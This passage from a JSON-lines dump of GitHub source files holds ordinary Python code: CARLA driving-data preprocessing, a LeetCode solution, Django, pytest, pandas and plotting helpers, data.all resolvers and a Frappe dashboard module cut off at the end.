occup_diff)\n mean_occup_diff = mean_occup_diff + occup_diff\n if transformation_only or occup_diff >= 0: #was 6\n if not transformation_only:\n return_clips.append(all_clips[-1])\n return_transformation.append(all_transformation[-1])\n else:\n print(\"Sequence not saved due to occupancy difference of \" + str(occup_diff))\n\n del 
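# Note on normalize_frames above: floor division by (255 // 2) == 127 followed
# by the -1 shift quantizes a 0-255 channel to exactly three levels {-1, 0, 1}.
# It is a thresholding step, not a continuous rescale, which suits the maps
# written as 0 or 255 by read_frame. Quick check:
import numpy as np

frames = np.array([0, 126, 127, 253, 254, 255], dtype=np.float32)
frames //= (255 // 2)  # -> [0, 0, 1, 1, 2, 2]
frames -= 1            # -> [-1, -1, 0, 0, 1, 1]
print(frames)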
all_clips[-1]\n del all_transformation[-1]\n all_clips.insert(0, create_default_element(image_size, seq_length, channel_size))\n all_transformation.insert(0, np.zeros([seq_length, 3, 8], dtype=np.float32))\n\ndef preprocessing(img, rgb, depth, segmentation, yaw_rate, speed):\n global occupancy_buffer, occlusion_buffer, transformation_buffer, rgb_buffer, depth_buffer\n global segmentation_buffer, data_size, direction_buffer, return_clips, return_transformation\n seq_length = K + 1\n\n #find the direction (left,right,straight)\n if yaw_rate < -0.5: #going left\n direction_buffer.append([1,1])\n elif yaw_rate > 0.5: #going right\n direction_buffer.append([0,1])\n else: #going straight\n direction_buffer.append([0,0])\n new_size = tuple(t//8 for t in rgb.shape[:-1]) # from 1920 x 640 to 240 x 80\n data_size = [new_size[1], new_size[0]]\n new_size = tuple(data_size)\n rgb_buffer.append(pp.transform_input(rgb, new_size, False))\n depth_buffer.append(pp.transform_input(depth, new_size, True))\n segmentation_buffer.append(pp.transform_input(segmentation, new_size, False))\n occupancy_img = pp.cropAndResizeImage(img)\n occupancy_array = np.array(occupancy_img)\n if len(occupancy_array.shape) == 3:\n occupancy_array = np.mean(occupancy_array, axis=2)\n occlusion_array = pp.createOcclusionMap(occupancy_array)\n occupancy_mask = pp.createOccupancyMask(occupancy_img, occlusion_array, thresh)\n transformation_matrix = pp.calcImageTranslation(occupancy_array, yaw_rate, speed)\n occupancy_buffer.append(occupancy_mask)\n occlusion_buffer.append(occlusion_array)\n transformation_buffer.append(transformation_matrix)\n if len(occupancy_buffer) >= K+1:\n return_clips = []\n return_transformation = []\n compressMoveMapDataset(occupancy_buffer, occlusion_buffer, transformation_buffer, seq_length)\n return_camera_rgb = np.array(rgb_buffer)\n return_camera_segmentation = np.array(segmentation_buffer)\n return_camera_depth = np.expand_dims(np.array(depth_buffer),axis=-1)\n return_direction = np.array(direction_buffer).astype(np.uint8)\n tmpClips = np.stack(np.split(np.array(return_clips[0])[:,:,:seq_length*5], seq_length, axis=2), axis=2)\n input_seq = tmpClips[:,:,:-1,0:2]\n maps = tmpClips[:,:,:,2:4]\n input_seq[:,:,:,0:1] = np.multiply((tmpClips[:,:,:-1,4:5] + 1) // 2, (input_seq[:,:,:,0:1] + 1) // 2) * 2 - 1\n tf_matrix = np.array(return_transformation)[0]#[:seq_length-1]\n tf_matrix = tf_matrix[:seq_length-1]\n tf_matrix[:,:,2] = tf_matrix[:,:,2]\n tf_matrix[:,:,5] = - tf_matrix[:,:,5]\n del occupancy_buffer[0]\n del occlusion_buffer[0]\n del transformation_buffer[0]\n del rgb_buffer[0]\n del depth_buffer[0]\n del segmentation_buffer[0]\n del direction_buffer[0]\n return True, np.expand_dims(input_seq, axis=0), np.expand_dims(maps, axis=0), np.expand_dims(tf_matrix, axis=0), np.expand_dims(return_camera_rgb[1:], axis=0), np.expand_dims(return_camera_segmentation[1:], axis=0), np.expand_dims(return_camera_depth[1:], axis=0), np.expand_dims(return_direction[1:], axis=0)\n\n return False, -1, -1, -1, -1, -1, -1, -1\n","repo_name":"daviddao/selfdriving","sub_path":"carla/real_time_eval/tf_carla_eval.py","file_name":"tf_carla_eval.py","file_ext":"py","file_size_in_byte":16777,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"15590474210","text":"from typing import Optional\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n \n \nclass Solution:\n def isPalindrome(self, 
head: Optional[ListNode]) -> bool:\n # the idea is to compare the first half and the reversed second half\n \n # 1. find the middle \n slow, fast = ListNode(0, head), head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n first, second, slow.next = head, slow.next, None\n \n # 2. reverse second half\n prev = None\n while second:\n second.next, prev, second, = prev, second, second.next\n second = prev\n \n # 3. compare\n while first and second:\n if first.val != second.val:\n return False\n first, second = first.next, second.next\n return True\n \n \n ","repo_name":"windsuzu/Leetcode-Python","sub_path":"code/linked-list/palindrome-linked-list.py","file_name":"palindrome-linked-list.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"37817546153","text":"import requests\r\nimport json\r\n\r\ntry:\r\n configdata={\r\n \"clientAPIkey\": \"Z46I-CMFJ-3TC2-9SCT\",\r\n \"video_name\": \"kav1.mp4\"\r\n}\r\n url = \"http://127.0.0.1:5003/stt/upload\"\r\n response = requests.post(url, json=configdata)\r\n if response.status_code == 200:\r\n transcribed_text = response.json()[\"result\"] \r\n print(transcribed_text)\r\n else:\r\n transcribed_text = \"\"\r\n print(\"Request was not successful. Status code:\", response.status_code)\r\nexcept Exception as e:\r\n print(f\"Error: {e}\")","repo_name":"KaveeshTata/Interview_Fullstack_V2","sub_path":"Speech_To_Text_Accelerator_v1/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4476303497","text":"# Stuff related to the library\nLIBRARY_URL = \"https://github.com/GetRektByMe/Listen\"\n\n# Unrelated to anything we can use\nBASE_URL = \"https://listen.moe/api/\"\n\nAUTH_URL = BASE_URL + \"authenticate\"\n\n# Account endpoints\nUSER = BASE_URL + \"user\"\nUSER_FAVOURITES = BASE_URL + \"user/favorites\"\n\n# Song endpoints\nSONG_FAVOURITES = BASE_URL + \"songs/favorite\"\nSONG_REQUEST = BASE_URL + \"songs/request\"\n\nSOCKET_ENDPOINT = \"wss://listen.moe/api/v2/socket\"\n","repo_name":"byronvanstien/Listen","sub_path":"listen/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"2729479363","text":"# coding=utf-8\r\nfrom django.http import HttpResponse, HttpResponseBadRequest\r\nfrom django import forms\r\nfrom io import BytesIO\r\nfrom PIL import Image, ImageDraw\r\nfrom django.core.cache import cache\r\n\r\nfrom django.views.decorators.http import etag\r\n\r\n# class ImageForm(forms.Form):\r\n# height = forms.IntegerField(min_value=1, max_value=2000)\r\n# width = forms.IntegerField(min_value=1, max_value=2000)\r\n\r\ndef generate(width,height,image_format=\"PNG\"):\r\n # 服务器缓存,先看是否已有缓存\r\n key = '{}.{}.{}'.format(width, height, image_format)\r\n content = cache.get(key)\r\n if content is None:\r\n image = Image.new('RGB', (width, height))\r\n draw = ImageDraw.Draw(image)\r\n text = '{}x{}'.format(width, height)\r\n textwidth, textheight = draw.textsize(text)\r\n if textwidth < width and textheight < height:\r\n texttop = (height - textheight) // 2\r\n textleft = (width - textwidth) // 2\r\n draw.text((textleft, texttop), text, fill=(255, 0, 0))\r\n content = BytesIO()\r\n image.save(content, image_format)\r\n content.seek(0)\r\n # # 加入缓存\r\n # 
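# Quick check of the ListNode/Solution pair above. Note that isPalindrome is
# destructive: it cuts the list at the middle and leaves the second half
# reversed, which is fine for a one-shot test, but callers that keep the list
# would need a restore pass.
head = ListNode(1, ListNode(2, ListNode(2, ListNode(1))))
assert Solution().isPalindrome(head) is True
assert Solution().isPalindrome(ListNode(1, ListNode(2))) is False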
cache.set(key,content,60 * 60)\r\n return content\r\n\r\n# 浏览器缓存: etag 可以利用浏览器缓存技术\r\n# import hashlib\r\n# def generate_etag(request,width,height):\r\n# content = 'Placeholder:{0}×{1}'.format(width,height)\r\n# return hashlib.sha1(content.encode('utf-8')).hexdigest()\r\n#\r\n# @etag(generate_etag)\r\n# def placeholder(request, width, height):\r\n# # 传给视图的参数都是字符串,可以利用表单验证\r\n# form = generate({'height': height, 'width': width})\r\n# if form.is_valid():\r\n# height = form.cleaned_data['height']\r\n# width = form.cleaned_data['width']\r\n# # 生成特定尺寸的图片\r\n# image = form.generate()\r\n# return HttpResponse(image, content_type='image/png')\r\n# else:\r\n# return HttpResponseBadRequest('Invalid Image Request')\r\n\r\n\r\n# def generate(width,height,image_format=\"PNG\"):\r\n# image=Image.new('RGB',(width,height))\r\n# draw=ImageDraw.Draw(image)\r\n# text=\"{}x{}\".format(width,height)\r\n# textwidth,textheight=draw.textsize(text)\r\n# if textwidth<width and textheight<height:\r\n# texttop=(height-textheight)//2\r\n# textleft=(width-textwidth)//2\r\n# draw.text((textleft,texttop),text,fill=(255,0,0))\r\n#\r\n# content = BytesIO()\r\n# image.save(content, image_format)\r\n# content.seek(0)\r\n# # image.show()\r\n# return content\r\n# # generate(400,300)\r\n \r\n \r\n \r\n ","repo_name":"liuchenfen/django_img","sub_path":"django3/myAPP/createimg.py","file_name":"createimg.py","file_ext":"py","file_size_in_byte":2604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40736247265","text":"\"\"\"Test Addon Provider\"\"\"\nimport datetime\nimport time\nfrom typing import Any\n\nimport freezegun\nimport pytest\nfrom _pytest.logging import LogCaptureFixture\nfrom pydantic import HttpUrl\n\nfrom merino.middleware.geolocation import Location\nfrom merino.providers.amo.addons_data import ADDON_DATA, SupportedAddon\nfrom merino.providers.amo.backends.protocol import Addon, AmoBackendError\nfrom merino.providers.amo.backends.static import (\n STATIC_RATING_AND_ICONS,\n StaticAmoBackend,\n)\nfrom merino.providers.amo.provider import AddonSuggestion\nfrom merino.providers.amo.provider import Provider as AddonsProvider\nfrom merino.providers.amo.provider import invert_and_expand_index_keywords\nfrom merino.providers.base import SuggestionRequest\nfrom merino.providers.custom_details import AmoDetails, CustomDetails\n\n\nclass AmoErrorBackend:\n \"\"\"AmoBackend that raises an error for testing.\"\"\"\n\n async def get_addon(self, addon_key: SupportedAddon) -> Addon: # pragma: no cover\n \"\"\"Get an Addon based on the addon_key.\n Raise a `BackendError` if the addon key is missing.\n \"\"\"\n raise AmoBackendError(\"Error!!!\")\n\n async def fetch_and_cache_addons_info(self) -> None:\n \"\"\"Fetch addons to be stored.\"\"\"\n pass\n\n\nclass AmoInitErrorBackend:\n \"\"\"AmoBackend that raises an error during initialization.\"\"\"\n\n async def get_addon(self, addon_key: SupportedAddon) -> Addon: # pragma: no cover\n \"\"\"Get an Addon based on the addon_key.\n Raise a `BackendError` if the addon key is missing.\n \"\"\"\n raise AmoBackendError(\"Addon key missing!\")\n\n async def fetch_and_cache_addons_info(self) -> None:\n \"\"\"Initialize addons to be stored.\"\"\"\n raise AmoBackendError(\"Error!!!\")\n\n\n@pytest.fixture(name=\"keywords\")\ndef fixture_keywords() -> dict[SupportedAddon, set[str]]:\n \"\"\"Fixture for the keywords.\"\"\"\n return {\n SupportedAddon.VIDEO_DOWNLOADER: {\"addon\", \"download helper\"},\n SupportedAddon.LANGAUGE_TOOL: 
{\n \"dictionary\",\n },\n }\n\n\n@pytest.fixture(name=\"static_backend\")\ndef fixture_static_backend() -> StaticAmoBackend:\n \"\"\"Fixture for static backend.\"\"\"\n return StaticAmoBackend()\n\n\n@pytest.fixture(name=\"addons_provider\")\ndef fixture_addon_provider(\n keywords: dict[SupportedAddon, set[str]], static_backend: StaticAmoBackend\n) -> AddonsProvider:\n \"\"\"Fixture for Addon Provider.\"\"\"\n provider = AddonsProvider(\n backend=static_backend,\n keywords=keywords,\n name=\"amo\",\n score=0.3,\n min_chars=4,\n )\n return provider\n\n\ndef test_reverse_and_expand_keywords(keywords: dict[SupportedAddon, set[str]]):\n \"\"\"Test that we expand the keywords properly for the lookup table.\"\"\"\n assert {\n \"addon\": SupportedAddon.VIDEO_DOWNLOADER,\n \"download\": SupportedAddon.VIDEO_DOWNLOADER,\n \"download \": SupportedAddon.VIDEO_DOWNLOADER,\n \"download h\": SupportedAddon.VIDEO_DOWNLOADER,\n \"download he\": SupportedAddon.VIDEO_DOWNLOADER,\n \"download hel\": SupportedAddon.VIDEO_DOWNLOADER,\n \"download help\": SupportedAddon.VIDEO_DOWNLOADER,\n \"download helpe\": SupportedAddon.VIDEO_DOWNLOADER,\n \"download helper\": SupportedAddon.VIDEO_DOWNLOADER,\n \"dictionary\": SupportedAddon.LANGAUGE_TOOL,\n } == invert_and_expand_index_keywords(keywords)\n\n\n@pytest.mark.asyncio\nasync def test_query_string_too_short(\n addons_provider: AddonsProvider,\n):\n \"\"\"Test that we return no suggestion for a query that is too short.\"\"\"\n await addons_provider.initialize()\n req = SuggestionRequest(query=\"a\", geolocation=Location())\n assert [] == await addons_provider.query(req)\n\n\n@pytest.mark.asyncio\nasync def test_query_no_keyword_matches(\n addons_provider: AddonsProvider,\n):\n \"\"\"Test that a keyword that doesn't match any current keywords returns no results.\"\"\"\n await addons_provider.initialize()\n req = SuggestionRequest(query=\"amazing\", geolocation=Location())\n assert [] == await addons_provider.query(req)\n\n\n@pytest.mark.asyncio\nasync def test_query_return_match(\n addons_provider: AddonsProvider,\n):\n \"\"\"Test that we match one provider.\"\"\"\n await addons_provider.initialize()\n\n req = SuggestionRequest(query=\"dictionary\", geolocation=Location())\n expected_info: dict[str, str] = ADDON_DATA[SupportedAddon.LANGAUGE_TOOL]\n expected_icon_rating: dict[str, Any] = STATIC_RATING_AND_ICONS[\n SupportedAddon.LANGAUGE_TOOL\n ]\n assert [\n AddonSuggestion(\n title=expected_info[\"name\"],\n description=expected_info[\"description\"],\n url=HttpUrl(expected_info[\"url\"]),\n score=0.3,\n provider=\"amo\",\n icon=expected_icon_rating[\"icon\"],\n custom_details=CustomDetails(\n amo=AmoDetails(\n rating=expected_icon_rating[\"rating\"],\n number_of_ratings=expected_icon_rating[\"number_of_ratings\"],\n guid=expected_info[\"guid\"],\n )\n ),\n )\n ] == await addons_provider.query(req)\n\n\n@pytest.mark.asyncio\nasync def test_query_error(\n caplog: LogCaptureFixture, keywords: dict[SupportedAddon, set[str]]\n):\n \"\"\"Test that provider can handle query error.\"\"\"\n provider = AddonsProvider(\n backend=AmoErrorBackend(),\n keywords=keywords,\n name=\"addons\",\n score=0.3,\n min_chars=4,\n )\n await provider.initialize()\n\n req = SuggestionRequest(query=\"dictionary\", geolocation=Location())\n suggestions = await provider.query(req)\n assert suggestions == []\n\n assert len(caplog.messages) == 1\n assert caplog.messages[0].startswith(\"Error getting AMO suggestion:\")\n\n\n@pytest.mark.asyncio\nasync def test_fetch_addon_info_error(\n caplog: 
LogCaptureFixture, keywords: dict[SupportedAddon, set[str]]\n):\n \"\"\"Test that provider can handle fetch errors.\"\"\"\n provider = AddonsProvider(\n backend=AmoInitErrorBackend(),\n keywords=keywords,\n name=\"addons\",\n score=0.3,\n min_chars=4,\n )\n await provider._fetch_addon_info()\n\n assert len(caplog.messages) == 1\n assert caplog.messages[0].startswith(\"Failed to fetch addon information:\")\n\n # The last_fetch_at time has not been initialized\n assert provider.last_fetch_at is None\n\n\n@freezegun.freeze_time(\"2012-01-14 03:21:34\")\n@pytest.mark.asyncio\nasync def test_fetch_addon(\n addons_provider: AddonsProvider,\n keywords: dict[SupportedAddon, set[str]],\n):\n \"\"\"Test that provider can handle fetch errors.\"\"\"\n await addons_provider._fetch_addon_info()\n assert (\n addons_provider.last_fetch_at\n == datetime.datetime(\n year=2012, month=1, day=14, hour=3, minute=21, second=34\n ).timestamp()\n )\n\n\ndef test_should_fetch_false(addons_provider: AddonsProvider):\n \"\"\"Test that provider should fetch is false.\"\"\"\n addons_provider.last_fetch_at = time.time()\n assert addons_provider._should_fetch() is False\n\n\ndef test_should_fetch_true(addons_provider: AddonsProvider):\n \"\"\"Test that provider should fetch is true.\"\"\"\n addons_provider.last_fetch_at = (\n time.time() - addons_provider.resync_interval_sec - 100\n )\n assert addons_provider._should_fetch()\n","repo_name":"mozilla-services/merino-py","sub_path":"tests/unit/providers/amo/test_provider.py","file_name":"test_provider.py","file_ext":"py","file_size_in_byte":7296,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"40"} +{"seq_id":"12141582165","text":"import acquire\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom datetime import datetime\n\nimport warnings\nwarnings.filterwarnings('ignore')\n\ndef prepare_store(df):\n \"\"\"Takes in store data as pandas dataframe, prepares it, and returns cleaned dataframe\"\"\"\n \n # Convert sale date to datetime and set as index. Time portion not needed. 
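# Editor's note (added): a sketch of what invert_and_expand_index_keywords
# appears to compute, inferred purely from the expected dict in
# test_reverse_and_expand_keywords above; the real implementation lives in
# merino.providers.amo.provider and may differ in detail.
def invert_and_expand_index_keywords_sketch(keywords):
    index = {}
    for addon, kws in keywords.items():
        for kw in kws:
            first_word = kw.split()[0]
            # Index the first word, then every longer prefix of the phrase,
            # so partially typed queries ("download h", ...) still match.
            for end in range(len(first_word), len(kw) + 1):
                index[kw[:end]] = addon
    return index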
Splitting like this and specifying format speeds it up.\n df.sale_date = pd.to_datetime(df.sale_date.str.split(' 00:00:00 GMT').str[0].str.split(', ').str[1],format='%d %b %Y')\n\n df= df.set_index('sale_date').sort_index()\n \n # Create month and day of week columns\n df['month'] = df.index.month\n df['day_of_week'] = df.index.day_of_week\n \n # Calculate total sale amount ($$), sale quantity(amount) * item price\n df['sales_total'] = df.sale_amount*df.item_price\n \n df = df.rename(columns = {'sale_amount':'quantity'})\n \n \n return df\n\ndef prepare_power(df):\n \"\"\"Takes in OPS data as pandas dataframe, prepare it, and returns cleaned dataframe\"\"\"\n \n # Convert date to datetime and set as index\n df.index = pd.to_datetime(df.Date)\n\n df= df.sort_index()\n\n df['month'] = df.index.month\n df['year'] = df.index.year\n \n df.columns = [col.replace('+','_').lower() for col in df.columns]\n \n # Fill in null values with 0 - mostly from early years presumably when no alternative energy?\n df = df.fillna(0)\n \n return df","repo_name":"jesse-d-marder/time-series-exercises","sub_path":"prepare.py","file_name":"prepare.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"72820273399","text":"import json\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom texpl import compute_top_words\nfrom utils import read_file, write_file\nfrom string import Template\n\n\ndef plot_train_loss(rdf, out_file=None, dpi=300):\n fig, ax = plt.subplots(figsize=(6, 4))\n epochs = np.array(rdf.index) + 1\n ax.plot(epochs, rdf['train_loss'], color='#ff8c5e', label='train_loss')\n ax.plot(epochs, rdf['eval_loss'], color='#ff8c5e', linestyle='--', label='eval_loss')\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n ax.set_xlabel(\"Epoch\")\n ax.set_ylabel(\"Loss\")\n ax.legend([\"Training Loss\", \"Validation Loss\"])\n plt.tight_layout()\n if out_file is None:\n plt.show()\n else:\n plt.savefig(out_file, dpi=dpi)\n\n \ndef cluster_visualization(res_clusters, corpus, scores, uq_ids, template_file, out_file):\n clusters_json = []\n scores = np.array(scores)\n for c in np.unique(res_clusters):\n in_cluster = np.where(res_clusters==c)[0]\n top_words = compute_top_words([corpus[i] for i in in_cluster], n_top=4)\n clusters_json.append(\n {'name': ', '.join(top_words), 'score': round(float(scores[in_cluster].mean()), 3),\n 'children': [{\n 'name': corpus[i],\n 'score': round(float(scores[i]), 3),\n 'id': uq_ids[i]\n } for i in in_cluster]})\n \n clusters_json = {'name': '', 'children': clusters_json}\n d3_src = Template(read_file(template_file))\n\n html_src = d3_src.substitute({'python_data': json.dumps(clusters_json, indent=4)})\n write_file(out_file, html_src)\n \n\ndef plot_num_clusters(dis_thres, n_clusters, size=(6, 4), out_file=None, dpi=300):\n fig, ax = plt.subplots(figsize=size)\n bp = ax.bar([f\"{e:.2f}\" for e in dis_thres], n_clusters, color='#ffce72')\n ax.bar_label(bp)\n ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n plt.xlabel(\"Distance threshold\")\n plt.ylabel(\"Number of clusters\")\n plt.tight_layout()\n if out_file is None:\n plt.show()\n else:\n plt.savefig(out_file, dpi=dpi)\n\n\ndef plot_num_phrases(thres_vals, n_phrases, size=(6, 4), out_file=None, dpi=300):\n fig, ax = plt.subplots(figsize=size)\n bp = ax.bar([f\"{e:.2f}\" for e in thres_vals], n_phrases, color='#ff8c5e')\n ax.bar_label(bp)\n 
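# Editor's note (added): a tiny standalone illustration of the sale_date
# parsing in prepare_store above, on a made-up sample value (the input
# format is assumed from the string operations in the code):
import pandas as pd

s = pd.Series(["Tue, 01 Jan 2013 00:00:00 GMT"])
parsed = pd.to_datetime(
    s.str.split(" 00:00:00 GMT").str[0].str.split(", ").str[1],
    format="%d %b %Y",
)
# parsed[0] -> Timestamp("2013-01-01 00:00:00")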
ax.spines['top'].set_visible(False)\n ax.spines['right'].set_visible(False)\n plt.xlabel(\"Standard deviations\")\n plt.ylabel(\"Number of phrases\")\n plt.tight_layout()\n if out_file is None:\n plt.show()\n else:\n plt.savefig(out_file, dpi=dpi)\n","repo_name":"arteagac/tna","sub_path":"plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"9904909040","text":"\"\"\"Program to count votes\r\n2014-04-23\r\nTauhirah Eguardo\"\"\"\r\nfrom collections import Counter\r\n\r\ndef organiser(array,orig):\r\n #use counter function on original list, to get values in new list\r\n #\r\n x = Counter(orig)\r\n for i in range(len(array)):\r\n array[i] = \"{:<10}\".format(array[i]) +\" - \" + str(x[array[i]])\r\n i += 1 \r\n \r\n#found fastest method using fromkeys() to remove duplicates in list.\r\n#http://www.peterbe.com/plog/uniqifiers-benchmark\r\n#Better than original cleaner, runs much much faster.\r\ndef cleaner(seq):\r\n \r\n return sorted({}.fromkeys(seq).keys())\r\n\r\ndef main():\r\n string_list = []\r\n name =\"\"\r\n print(\"Independent Electoral Commission\\n\"\r\n \"--------------------------------\\n\"\r\n \"Enter the names of parties (terminated by DONE):\")\r\n #while loop to add values to list\r\n while name != \"DONE\":\r\n name = input()\r\n string_list.append(name)\r\n del string_list[-1]\r\n new_list = cleaner(string_list)\r\n organiser(new_list,string_list)\r\n print()\r\n print(\"Vote counts:\")\r\n for i in range(len(new_list)):\r\n print(new_list[i])\r\nmain()","repo_name":"MrHamdulay/csc3-capstone","sub_path":"examples/data/Assignment_6/edwmoe001/question3.py","file_name":"question3.py","file_ext":"py","file_size_in_byte":1255,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"20011798553","text":"from dataall.base.api.context import Context\nfrom dataall.core.environment.db.environment_models import Environment\nfrom dataall.core.organizations.api.enums import OrganisationUserRole\nfrom dataall.core.organizations.db.organization_repositories import Organization\nfrom dataall.core.organizations.db import organization_models as models\n\n\ndef create_organization(context: Context, source, input=None):\n with context.engine.scoped_session() as session:\n organization = Organization.create_organization(\n session=session,\n data=input,\n )\n return organization\n\n\ndef update_organization(context, source, organizationUri=None, input=None):\n with context.engine.scoped_session() as session:\n return Organization.update_organization(\n session=session,\n uri=organizationUri,\n data=input,\n )\n\n\ndef get_organization(context: Context, source, organizationUri=None):\n with context.engine.scoped_session() as session:\n return Organization.get_organization_by_uri(\n session=session, uri=organizationUri\n )\n\n\ndef list_organizations(context: Context, source, filter=None):\n if not filter:\n filter = {'page': 1, 'pageSize': 5}\n\n with context.engine.scoped_session() as session:\n return Organization.paginated_user_organizations(\n session=session,\n data=filter,\n )\n\n\ndef list_organization_environments(context, source, filter=None):\n if not filter:\n filter = {'page': 1, 'pageSize': 5}\n with context.engine.scoped_session() as session:\n return Organization.paginated_organization_environments(\n session=session,\n uri=source.organizationUri,\n data=filter,\n )\n\n\ndef stats(context, 
source: models.Organization, **kwargs):\n with context.engine.scoped_session() as session:\n environments = Organization.count_organization_environments(\n session=session, uri=source.organizationUri\n )\n\n groups = Organization.count_organization_invited_groups(\n session=session, uri=source.organizationUri, group=source.SamlGroupName\n )\n\n return {'environments': environments, 'groups': groups, 'users': 0}\n\n\ndef resolve_user_role(context: Context, source: models.Organization):\n if source.owner == context.username:\n return OrganisationUserRole.Owner.value\n elif source.SamlGroupName in context.groups:\n return OrganisationUserRole.Admin.value\n else:\n with context.engine.scoped_session() as session:\n if Organization.find_organization_membership(\n session=session, uri=source.organizationUri, groups=context.groups\n ):\n return OrganisationUserRole.Invited.value\n return OrganisationUserRole.NoPermission.value\n\n\ndef archive_organization(context: Context, source, organizationUri: str = None):\n with context.engine.scoped_session() as session:\n return Organization.archive_organization(\n session=session,\n uri=organizationUri,\n )\n\n\ndef invite_group(context: Context, source, input):\n with context.engine.scoped_session() as session:\n organization, organization_group = Organization.invite_group(\n session=session,\n uri=input['organizationUri'],\n data=input,\n )\n return organization\n\n\ndef remove_group(context: Context, source, organizationUri=None, groupUri=None):\n with context.engine.scoped_session() as session:\n organization = Organization.remove_group(\n session=session,\n uri=organizationUri,\n group=groupUri\n )\n return organization\n\n\ndef list_organization_invited_groups(\n context: Context, source, organizationUri=None, filter=None\n):\n if filter is None:\n filter = {}\n with context.engine.scoped_session() as session:\n return Organization.paginated_organization_invited_groups(\n session=session,\n uri=organizationUri,\n data=filter,\n )\n\n\ndef list_organization_groups(\n context: Context, source, organizationUri=None, filter=None\n):\n if filter is None:\n filter = {}\n with context.engine.scoped_session() as session:\n return Organization.paginated_organization_groups(\n session=session,\n uri=organizationUri,\n data=filter,\n )\n\n\ndef resolve_organization_by_env(context, source, **kwargs):\n \"\"\"\n Resolves the organization for environmental resource.\n \"\"\"\n if not source:\n return None\n with context.engine.scoped_session() as session:\n env: Environment = session.query(Environment).get(\n source.environmentUri\n )\n return session.query(models.Organization).get(env.organizationUri)\n","repo_name":"awslabs/aws-dataall","sub_path":"backend/dataall/core/organizations/api/resolvers.py","file_name":"resolvers.py","file_ext":"py","file_size_in_byte":4851,"program_lang":"python","lang":"en","doc_type":"code","stars":190,"dataset":"github-code","pt":"40"} +{"seq_id":"24777690449","text":"from __future__ import unicode_literals\nfrom frappe.model.document import Document\nfrom frappe.modules.export_file import export_to_files\nimport frappe\nfrom frappe import _\nimport json\nfrom frappe.desk.doctype.dashboard.dashboard import Dashboard\n\ndef on_update(self):\n\tif self.is_default:\n\t\t# make all other dashboards non-default\n\t\tfrappe.db.sql('''update\n\t\t\ttabDashboard set is_default = 0 where name != %s''', self.name)\n\n\tif frappe.conf.developer_mode and self.is_standard:\n\t\texport_to_files(record_list=[['Dashboard', self.name, self.module 
+ ' Dashboard']], record_module=self.module)\n\n\ndef validate(self,method):\n\tif frappe.session.user != 'Administrator' and self.is_standard:\n\t\tfrappe.throw(\"Cannot edit Standard Dashboard. Please Contact Administrator\")\n\n\tif not frappe.conf.developer_mode and self.is_standard:\n\t\tfrappe.throw('Cannot edit Standard Dashboards')\n\n\tif self.is_standard:\n\t\tnon_standard_docs_map = {\n\t\t\t'Dashboard Chart': get_non_standard_charts_in_dashboard(self),\n\t\t\t'Number Card': get_non_standard_cards_in_dashboard(self)\n\t\t}\n\n\t\tif non_standard_docs_map['Dashboard Chart'] or non_standard_docs_map['Number Card']:\n\t\t\tmessage = get_non_standard_warning_message(non_standard_docs_map)\n\t\t\tfrappe.throw(message, title=_(\"Standard Not Set\"), is_minimizable=True)\n\n\tvalidate_custom_options(self)\n\ndef validate_custom_options(self):\n\tif self.chart_options:\n\t\ttry:\n\t\t\tjson.loads(self.chart_options)\n\t\texcept ValueError as error:\n\t\t\tfrappe.throw(_(\"Invalid json added in the custom options: {0}\").format(error))\n\n@frappe.whitelist()\ndef get_permitted_charts(dashboard_name):\n\tpermitted_charts = []\n\tdashboard = frappe.get_doc('Dashboard', dashboard_name)\n\tfor chart in dashboard.charts:\n\t\tif frappe.has_permission('Dashboard Chart', doc=chart.chart):\n\t\t\tchart_dict = frappe._dict()\n\t\t\tchart_dict.update(chart.as_dict())\n\n\t\t\tif dashboard.get('chart_options'):\n\t\t\t\tchart_dict.custom_options = dashboard.get('chart_options')\n\t\t\tpermitted_charts.append(chart_dict)\n\n\treturn permitted_charts\n\n@frappe.whitelist()\ndef get_permitted_cards(dashboard_name):\n\tpermitted_cards = []\n\tdashboard = frappe.get_doc('Dashboard', dashboard_name)\n\tfor card in dashboard.cards:\n\t\tif frappe.has_permission('Number Card', doc=card.card):\n\t\t\tpermitted_cards.append(card)\n\treturn permitted_cards\n\ndef get_non_standard_charts_in_dashboard(dashboard):\n\tnon_standard_charts = [doc.name for doc in frappe.get_list('Dashboard Chart', {'is_standard': 0})]\n\treturn [chart_link.chart for chart_link in dashboard.charts if chart_link.chart in non_standard_charts]\n\ndef get_non_standard_cards_in_dashboard(dashboard):\n\tnon_standard_cards = [doc.name for doc in frappe.get_list('Number Card', {'is_standard': 0})]\n\treturn [card_link.card for card_link in dashboard.cards if card_link.card in non_standard_cards]\n\ndef get_non_standard_warning_message(non_standard_docs_map):\n\tmessage = _('''Please set the following documents in this Dashboard as standard first.''')\n\n\tdef get_html(docs, doctype):\n\t\thtml = '<p>{}</p>'.format(frappe.bold(doctype))\n\t\tfor doc in docs:\n\t\t\thtml += '<div><a href=\"#Form/{doctype}/{doc}\">{doc}</a></div>'.format(doctype=doctype, doc=doc)\n\t\thtml += 